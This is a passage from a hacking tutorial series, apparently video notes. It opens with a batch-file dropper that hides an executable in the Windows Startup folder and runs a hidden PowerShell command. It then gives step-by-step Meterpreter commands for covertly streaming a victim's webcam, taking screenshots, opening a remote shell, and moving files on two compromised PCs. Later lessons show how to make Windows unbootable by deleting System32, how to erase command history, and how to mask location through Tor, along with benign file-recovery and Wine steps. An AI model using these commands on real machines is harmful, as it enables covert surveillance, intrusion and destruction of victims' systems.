move "%appdata%\f.exe" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\f.exe"
set t=%date:~4,5%
if "%t%"=="03/02" goto :A
if not "%t%"=="03/02" goto :B
timeout /t 02 > nul
powershell -w 1 -C "sv x -;sv ZO ec;sv h ((gv x).value.toString()+(gv ZO).value.toString());powershell (gv h).value.toString() 'INSERT-HERE'" > nul
timeout /t 05
start "" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\f.exe" 2> nul
timeout /t 05


f.bat file contents This bat file tells windows to remove the f1.exe file whenever the user restarts the computer.


@echo off
taskkill /im f1.exe /f 2> nul
taskkill /im powershell.exe /f
timeout /t 04 > nul
del "%appdata%\f1.exe" /q /s /f 2> nul


Bat to Exe Converter Download Link

Note: Any Icon Maker can be used, you don't have to use a specific one.

Big J Icon Maker Download Link copy & Paste in your browser above Also it should be noted that any Icon Maker should work, you don't have to use this one.

28. Wlan Pentest Create Icon Preparing Payload Windows 7

The Users has already clicked the Payloads that was concealed earlier, The Payload has called the Linux Pc with a Meterpreter session.

This video shows the Linux user Hacking the 2 Pcs through the Meterpreter Terminal.

1. = do a quick check, make sure port 443 is open on the Public Ip address of the first Router.

2. sessions -i = is entered in the listener to view all active connections that has been established.

3. sessions -i 3 = connects to ID Number 3, the Windows 7 AUser user that has connected to the listener through the Payload.

4. help = to view the help page for the meterpreter.

5. webcam_list = views a list of webcams that is connected to AUser Windows 7 Pc.

6. webcam_stream 1 = streams from Webcam 1 attached to the AUser windows 7 Pc, which happens to be the only Webcam attached to the Pc.

7. Ctrl + mouse wheel = It shows a small thumbnail through firefox browser, you can zoom in on the thumnail by pressing Ctrl & rolling your mouse wheel. Rolling it one way, makes it smaller, while the other makes it bigger.

I told my friend over the Phone, then she gives me a thumbs up. She doesn't see anything on-screen to indicate that I am watching her she tells me over the phone.

8. Ctrl+C = I first exit the Streaming Firefox Tab, then go back to the Meterpreter Session and type Ctrl+C to cancel the Webcam Stream.

9. webcam_snap 1 = takes a current snapshot of what webcam 1 is currently viewing.

10. Opened the snapshot that had been taken with Linux default photo viewer, then use the mousewheel to zoom in on the Photo.

11. help = typed help in the meterpreter session again, looked through the Meterpreter help page until I find Screenshot (I already knew this, but did this for demonstration purposes.)

12. screenshot = takes a screenshot of AUser's screen, what they are viewing right now.

It saved in the rc folder where the Listener was started.

13. I navigate to the rc folder and preview the screenshot which was taken.

14. shell = takes the meterpreter session right into AUser's Command Prompt as if we were standing right infront of it.

15. tasklist = views the running processes on AUser's Windows 7 Pc.

16. taskkill /im chrome.exe /f = kills the chrome internet browser.

17. exit = exits the shell for AUser, and goes back to the Meterpreter session with AUser.

18. screenshot = takes a new screenshot of AUser's screen.

19. pwd = shows the Present Working Directory, If you get a warning that says, "failed to open" don't worry about it, just type this command and it will bypass it.

20. upload '//root//Desktop//sltb.PNG' "C:\\Users\\AUser\\Desktop\\sltb.PNG" = Uploads the file sltb.PNG from the Linux Pc to the AUser's Desktop.

21. shell = returns to AUser's Shell. We were in the Desktop folder using the Meterpreter Session, so we are there using the Shell as well.

22. dir = displays the files on AUser's Desktop.

23. sltb.PNG = executes the image file from AUser's shell, displaying the picture on the Windows 7 Pc's Screen.

24. exit = exits AUser's shell, Linux Pc returns back to the Meterpreter Session with AUser.

25. screenshot = takes a Screenshot of AUser's screen.

26. Navigate to the Rc folder, and find the screenshot that was taking it, and preview it with the default Linux Image Viewer.

The Image that was uploaded using the Meterpreter session is being shown on their screen.

27. pwd = We receive another annoying warning message, but just typed pwd to bypass it.

28. shell = drops into AUser's shell again.

29. taskkill /im dllhost.exe /f = I am familiar enough with windows 7 pcs, and have looked at the process of the default image viewer enough to remember the name was dllhost,

so I task Killed the dllhost process, this process would have also shown up somewhere if we did the tasklist to view the running processes for AUser.

30. exit = exits the shell, goes back to the Meterpreter session with AUser.

31. screenshot = takes another screenshot of AUser's screen, the image should be closed now.

32. Navigate to the Rc folder and view the screenshot, the image that was uploaded is now closed because the dllhost.exe process has been terminated.

The Thumbnail of the image that was uploaded can be visibly seen on the Desktop, since we did not delete it, we just closed the image.

We receive another annoying warning message, this time I close it by pressing Ctrl+c, I could've just typed "pwd" again.

33. shell = Goes into the AUser's shell again.

34. sltb.PNG = Starts the image file again.

35. exit = exits the AUser's Shell and goes to the Meterpression connection with AUser.

36. dir = lists the files on the Desktop using the Meterpreter session. "ls" would have also listed the same files.

Look for an image to download.

37. download dspace.PNG = I gave the command to Download dspace.PNG file from AUser's Desktop. The dspace.PNG is opened from the usual rc folder, the same place where the screenshot and webcam snapshots were saved.

38. screenshot = takes another screenshot of AUser's Desktop.

39. Navigate to the rc folder, view the latest screenshot of AUser's Computer that the Meterpreter took.

40. background = Backgrounding a Meterpreter session leaves it open for reconnecting as long as we have the Listener open.

41. sessions -i 2 = opens the meterpreter session with the other pc that I had backgrounded in the Listener.

42. pwd = finds where the meterpreter session was last backgrounded at, it was last backgrounded at GM Project's Desktop.

43. screenshot = screenshot was taken, when it's viewed, it is revealed that GM Project's Computer Folder is currently open on their Pc.

44. upload '//root//Desktop//sltb.PNG' "C:\\Users\\GM Project\\Desktop\\sltb.PNG" = uploads a file called sltb.PNG to the Target Pc from the Linux Pc using the Meterpreter Terminal.

45. shell = Opens a shell between the Linux user and GM Project.

46. dir = lists the files on Gm Project's Desktop.

47. sltb.PNG = opens the image that was previously uploaded using GM Project's Shell.

48. exit = exits the shell, goes back to the Meterpreter Session.

49. screenshot = takes a screenshot of GM Project's Desktop.

When the screenshot is viewed, it is discovered that the file is opened.

50. dir = look for a photo to download from Gm Project's Desktop.

51. download ozquote.PNG = downloads ozquote.PNG file from GM Project's Desktop since I am currently navigated there, there is no reason to type the full path with the Download Command.

52. screenshot = takes another snapshot of GM Project's Desktop. If you were sitting infront of their computer, you couldn't see any of this going on except for commands being executed by the shell that are visible to GM Project's screen like when we opened the image that we uploaded to the pc.

53. exit = completely closes the session with GM Project, will no longer be able to connect to it.

54. sessions -i = views the remaining active connection with AUser.

55. sessions -help = to view the switches associated with the Listener.

It is discovered that the lowercase -k switch will terminate a session if the ID number is included.

56. sessions -k 3 = Terminates the session with AUser's Pc.

57. sessions -i = checks for active sessions, there is none.

29. Wlan Pentest session on Two Windows 7 Pcs

IDE Hard Drives are from 2008 & below

Sata Hard Drives are from 2008 & above

1. Place the hard drive into the Hdd Docking Station easily but securely, i have had to enter a drive up to 5 times before it read before.

2. Plug the docking station into the wall, and plug the usb port from the docking station to your computer.

3. Turn on the docking station, look for the red light to blink atleast once.

4. Look at your computer, it should detect the hard drive as it would a Usb stick, then you may navigate through the Hard Drive if everything worked.

    Hdd Docking Station do not work on all hard drives from my experience it worked on 2/3 drives I tested on 1/1 laptop ide drive and 1/2 desktop ide hard drive it doesnt work everytime, but when it does work it's impressive to use.

30. How to Hack a Raw Hard Drive

PhotoRec file recovery & Recoverying Specific File Types.

1. Plug in external hard drive, mine was a 900+ GB Toshiba external hard drive.

Note: You cannot recover files from the same drive that you're using to run Kali on. You will have to first boot with a kali Usb then recover the files from a different drive, than the Usb Drive itself (The Reason Why:Kali Usb Drive is only 16 GB ).

2. For this example, I plugged in my A sd card through a usb reader, which is only 130+ MB of space.

This File Recovery will work on actual hard drives as well tho, as long as you have

enough space for the destination files to go after they are recovered. So if you're recovering files from 80gb you can't expect 16gb sd card to successfully recover all of the files.

3. I Navigate to the 900+GB External destination hard drive and create a folder for the recovered files that I am going to recover from the "a" 130 mb sd, usb drive.

4. I then unmount the 900+ GB Toshiba Hard Drive.

5. Because, I'll need to mount it using the Terminal.

6. cd /media;ls = Navigates to the media folder and make a directory for the toshiba 900+gb external hard drive.

7. fdisk -l = list the different drives and volumes that are connected to this Pc.

8. Once I find the drive that matches my toshiba external hard drive in size, I mount it under the Toshiba directory that I previously created in the media folder.

9. mount /dev/sdc1 /media/toshiba;ls = I list the contents of the media folder, The Toshiba folder now turns green, which means it is mounted.

"Ctrl+Shift+T" Opens up a new Terminal Tab.

10. photorec = in the new tab, I start the recovery program PhotoRec

11. I select the 130 mb A sd, usb drive that I would like to recover files from.

12. Fat16 as the Partition in my case, this drive was used with windows previously.

13. I select "Other" Fat/ntfs/hfs+/ReiserF5/... = for Windows type files, if I was recovering files from a Linux Pc, I would select the ext2/ext3/ext4 filesystem option here instead.

14. I select whole which scans the whole "A sd, usb drive, or hard drive chosen" for any recoverable files that it can find.

15. Now it's asking me to select a destination where I would like to save the recovered files, I could save them to my Usb drive since the original files could only be 130mb and I have almost 16 gb free on the drive, but for this demonstration, I'll select to save them to my Mounted 900+ Toshiba hard drive, if you are learning from this tutorial, you probably wish to recover files from a source much larger than a 130 mb sd, usb drive. I want to teach you right, if I am going to teach you.

16. I select ".." to go back a directory, until I navigate to the beginning of my Usb drive, I then select the "media" folder, then I select the "toshiba" folder which we mounted at the beginning of this video.

17. Now I navigate to the "Recovered files" folder that I created at the beginning of this video for the files that I plan to recover.

18. Once I navigate there, as the onscreen instruction tells us, I just press the "c" key to say that's the correct destination for the recovered files.

19. PhotoRec begins to scan the "130mb sd card we selected" drive for files to recover. Mine completes in a very short time because it was only 130 mb, yours may take a few hours if you are scanning something like Gb or larger, 80gb took me around 39 hours on a slow computer before.

20. "Enter" is pressed over the "Quit" Option once all files are recovered.

21. then I pressed "q" a few times to get out of PhotoRec program.

22. If it doesn't exit, you can always try, "Ctrl+C"

23. umount /media/toshiba;ls = Now I'll go back to my first terminal window and unmount the toshiba 900+ gb external drive. Now the device should show up without the green highlight, which means it should have unmounted.

24. rm -r toshiba;ls = I can now unplug the usb device, and remove the folder I had it mounted to.

25. exit = exits that terminal window.

26. exit = exits the photorec terminal window as well.

27. I plug in my toshiba 900+ gb external USB drive into the computer again.

28. Find my recovered files folder, or folders that it has recovered. I view some of them, to see if they worked, and it does.

29. Now I make a new folder called "A1RECOVEREDSDKEEP" which I plan to use to organize the recovered files from Photorec, Note: You can name the folder differently, it doesn't matter.

30. I open the new folder, in another tab, and open the original folder which has the recovered files in it also.

31. For my new folder, I can create several sub-folders in it, naming each one a different file type, for example, "MOV" for all the MOV files that I can find.

32. Go at the beginning of the recovered files directories, and just type what extension you are looking for, ".jpg" Would find all Jpg filetypes that has been recovered.

33. You can cut files from the recovered files folder, to the new organized folder that we created, they will either disappear and go to the new folder that we created, or their path will change from the old path, to the new one. (If your system freezes, this is a typical issue that I had.) try leaving it searching for like 5 minutes, then just cutting a few files at a time if necessary. I can cut a lot since I have a Computer with 14 GB of ram for this.

34. We can highlight a file, then hold shift and left click on another file above or below that one to highlight multiple files, carefully not selecting so much as to cause our pc to lock up. Sometimes, it may take a while to load if I were selecting a huge amount of files, I have waited patiently for 3 minutes before while selecting a bunch of files at once, without clicking anything or pressing anything so that it will have time to process that I've selected those files.

35. You just do this for all of the filetypes that you wish to recover.


Method 2.

Recovery Method No. 2.


for Windows xp-10

Note: for Windows Xp Users, many users don't know about the hidden Administrator account which can be accessed without a password just by tapping f8 repeatedly after turning the pc on at the beginning logo. If you make it to that Command Prompt, Administrative Command Prompt is accessed, and you can create/deleteusers, or remove passwords from administrative accounts.

1. Search google for Recuva

2. Download free version of Recuva.

3. Run Recuva's installer as an Admin on the computer you wish to recover files from.

4. Uncheck read release notes, Run Recuva.

5. Use the Wizard to choose what types of files you wish to recover, and the location of the drive or sd, or usb storage device that you would like to recover files from.

6. You can choose advanced mode, and preview the images before you recover them, to select certain things to recover, or you can recover it all to an external drive and sort through them using the same method we did with Photorec files in Linux.

7. After a long wait-time, (it can take anywhere from 30-40 hours or more to recover files from large drives.)

I would Choose an External Drive location to recover the recovered files to if I were serious about recovering the files.

For this example, I just chose to recover the files from the same drive which could fail, but didn't in my example.

Note: Your recovery will have a better success rate if you recover the files to an external drive vs. what I did in the method 2. section of the video.

31. PhotoRec File Recovery & File Types

1. winecfg = configures the hidden .wine folder in the home directory, and opens the wineconfig window.

2. For my purposes, I selected Windows 7 as the version of windows it tries to simulate. I could add an application to make that application only open with that specific windows type, but I am not going going to do it, just wanted to show you that feature.

3. cd ~/Downloads = I will navigate to the folder which has the .exe file I wish to open with wine, the simulated windows.

4. wine 'Software Name.exe' = tries to open a program called, "Software Name.exe" in wine.

     It has opened up my chosen program, wine is gradually improving all the time, and it opens up many different .exe files, but there are still a lot that it is not compatible with, for these you will need a copy of windows in order to open them.

5. Now we will close out that program, and navigate to the Linux File explorer, and open other locations, and find an exe file to run that is directly on the computer's hard drive instead of the Kali Usb Drive as we did a few seconds ago.

6. wine 'DRAG PROGRAM HERE' = Once I find the program I wish to open, I type wine then space and drag the program into the terminal window which auto-fills the path to it. Different programs takes different times to open using wine, remember, it's not as fast as windows, it's just trying to imitate windows and see if it can open the program. You are lucky if it can open it at all, that's great, so waiting a few seconds to a minute shouldn't be an issue while testing to see if your program will open using wine or not. I have no problems with these programs at all, they must have been developed by a fantastic Game Maker Developer with extra cool human abilities ha ha ha ha

7. wine 'DRAGPROGRAMTOINSTALL.exe' = Now let's discuss how to install a program in the emulated windows that wine provide by opening a windows program installer using wine.

Sometimes if a Program does not run in Wine, it just needs to be installed into it, then it runs fine.

8. You just go through the normal install process as you would if you were using Windows.

9. cd ~/.wine/drive_c;ls = To navigate to the hidden wine drive c folder, and list the contents of it.

10. cd 'Program Files'/ = Navigates to the Program Files of wine.

11. ls = lists the files within Program Files.

12. Find the program that you just installed, if you are unsure, try a few different ones, wine doesn't come with too many program files so it shouldn't be too difficult to find it.

13. wine 'PROGRAM FILE.EXE' = Open the Program's .exe file that you just installed, for me it was Read Please 2003.

14. If you would like to navigate to the '~/.wine/drive_c/windows/system32' and do a "ls contro*" you can find the control.exe which can be ran with wine within that folder.

15. From there you can view the add or remove programs button.

16. You can remove some programs from there with a point and click method. You can get out of "control.exe" by pressing "Ctrl+C" while the terminal window you opened it from is active.

17. You could also remove the programs by navigating back to the Program Files and removing them.

18. If nothing else works you can keep typing, "cd .." until you get back to the tilda "~" directory and "rm -r .wine" to get rid of the wine configuration folders entirely.

19. winecfg = to reconfigure wine just like the first time we ran it, so it's no program to completely wipeout your wine directories and re-configure it the same way as before if you feel that your wine has extra unnecessary junk files.

20. search for "download PROGRAM NAME windows" = to find a windows download link for the program that you are looking for.

21. wine 'DRAG INSTALLER OF PROGRAM HERE.EXE' = to go through the windows installation process through the emulated wine program.

22. cd '~/.wine/drive_c/Program Files/Program Folder' = Navigate to the Program's folder that you just installed.

23. wine 'Program Name.exe' = to open the program's executable file.

24. Either the Vlc did not support the .webm video format, or the name that linux gave the video file was too long for Vlc player to understand fully, Since windows usually has a limit on how many characters your program name can find. 256 characters is the name limit for windows, also it disallows some punctuations.

25. cd ~/.wine/drive_c/windows/system32 = Navigates to the wine's windows system32 folder.

26. wine explorer.exe = opens the emulated windows wine explorer.exe

27. This will make navigating with a Graphical User Interface in Wine possible for those of you who would prefer it over the terminal sometimes.

32. Using Wine in Linux

1. apt-get install tor = installs tor, or it gives an error message which will instruct you what to do to make it go smoothly.

2. dpkg --configure -a = is the message code it gave me to type to make the installation go smoothly.

3. Yes = Select yes with arrows & enter key.

4. apt-get install tor = installs tor from repositories.

5. apt --fix-broken install = it gave another message to fix the broken install version of tor.

6. y = press y to continue.

7. apt-get install tor = we type this again.

8. y = press y to continue.

9. service tor status = once it completes, we can type this to see that it's inactive.

10. service tor start = starts tor.

11. nano /etc/proxychains.conf = scroll to the bottom and check that socks4 is set to 9050

12. service tor status = we now see that tor is active.

13. proxychains firefox = opens firefox through Tor Network, and visits the site

14. = the page will load and tell you where it detects that you are from, if you are using the tor network, it will make you appear as if you're from somewhere entirely different, either a different state, or different country, if you don't like where it says you are from, you can exit firefox, then type, service tor stop then service tor start again and revisit the site through the proxychains command as we did earlier, and it will almost always choose a different location for you.

15. You can view the open terminal window which we ran the proxychains command from to see the outgoing responses progress to see if it's working or not, if you get tired of waiting, and want to check the progress.

16. Now I am visiting Youtube from Romania's location.


Opening a program using Tor.

1. proxychains wine 'DRAGPROGRAMHERE' = This command will open a program using wine through the Tor Network, so that the program will think you are from a different location.

33. Using TOR with Firefox & Wine

Note: Don't do this to your main computer only attempt this if you have a complete junk computer that you don't care about, and just want to experiment. Just Incase. As a matter of fact, just don't do this since it will stop your system from booting up, I only did it because I like tearing things up then fixing them sometimes.

Making Windows 10 Unbootable, First in the video I show you the location of the system32 folder from within the Windows 10 Operating System, this folder contains very important files for windows xp-10 to run correctly, it has many of the default programs that are pre-installed with windows within the folder, if it's deleted it will render the operating system useless unless the operating system is re-installed through a disk or usb using an Iso File.

Never Delete this, deleting this will ruin the entire Operating System rendering the Pc Useless as I demonstrate within the video.

1. First I boot from Usb Bootable Kali Drive.

2. I open the Linux File Explorer, Left click on Other Locations,

3. Select the Drive of the Computer

4. Navigate to the Windows Folder, then Delete the System32 Folder = this will render the Pc Useless, we can left click on the icon to see the file deletion progress.

Some of the User files will still be on the hard drive in most cases, if they know how to do a Physical Access Hack as I showed earlier, most of the user files such as Desktop, Documents, Pictures should be recoverable. I haven't tested that theory, but I don't see why it's not possible, since this seems to only prevent windows from booting into the Operating System.

5. So now we just power down the Linux Usb Drive, and the next time the Windows 10 System Attempts to Bootup, it tries to repair itself, but it will fail.

Note: See how easily a Windows 10 System can be destroyed? Another reason why you should never leave your Pc system alone with Anyone.


Formatting Kali Usb Operating System Drive using Windows 7 Operating System, Deleting everything on it..

Killing a Linux Usb Drive using Minitool Partition Wizard in Windows. Then we really will be committing Operating System Homicide in both directions.

1. Open Minitool Partition Wizard, find the Linux Usb Drive (You should know how much GB in size it is, and be sure not to select your Operating System Drive. lol)

2. Right click each section on the Usb bootable drive space then delete it.

3. Right click on the newly unallocated space, and left click create, change the file system to FAT32 which will be readable by Windows.

4. Press Ok, then Apply.

5. It just takes a few seconds.

6. Now the Drive has been sucessfully wiped, Linux Operating System is no longer on the Usb Drive.

7. We can re-install Linux on the Usb Drive any time we want tho.

This can be useful, if you want to backup your Linux Files on Your Desktop, Pictures etc.. to an external drive, then wipe and re-install Linux to your Usb Drive if let's say, you wanted to upgrade to the latest Iso File.

I actually prefer upgrading Iso Files vs. trying to Upgrade the Operating System in Linux, Sometimes when you attempt to upgrade Iso files in Linux Two things happens often.

One: It takes forever to download the upgraded file.

Two: It could break or cause glitches in the Usb Linux Operating System on the Drive when you upgrade from a older Operating System.

Note: This can also be used to Erase your "History" of Terminal Commands by wiping the drive, and Re-installing Linux,

since you'll need to make the drive persistent all over again as we did in,

1. Creating Bootable Kali Linux Usb.

    You have made it to the End of the 6+hours Series, Thanks for watching, if you enjoyed let me know in the comments on the videos & by liking & commenting.

You can look back at Windows Playlist Lesson,

23. Fresh install of Windows 7 Ultimate Ver 32 or 64 bit

View the above, For Information on how to re-install Windows if someone has deleted your Operating System, You will have to purchase a new License Key from Ebay, so it's best to search there first to find out how much one costs, install the new Operating System, make sure everything works alright, if it doesn't google for solutions to the problems that you are having, then once it's working fine, purchase the new license key and Activate the Clean Install of Windows.

     Some Systems are a little different, Windows 8 & higher require for you to find the Audio Drivers for the Pc. You can usually find these by googling the manufacturer of the Pc in Question, or googling the model number of the Pc in Question and look for "audio drivers %manufacturename% %modelnumber%" for example when re-installing the Windows Os.

34. Operating System Homicides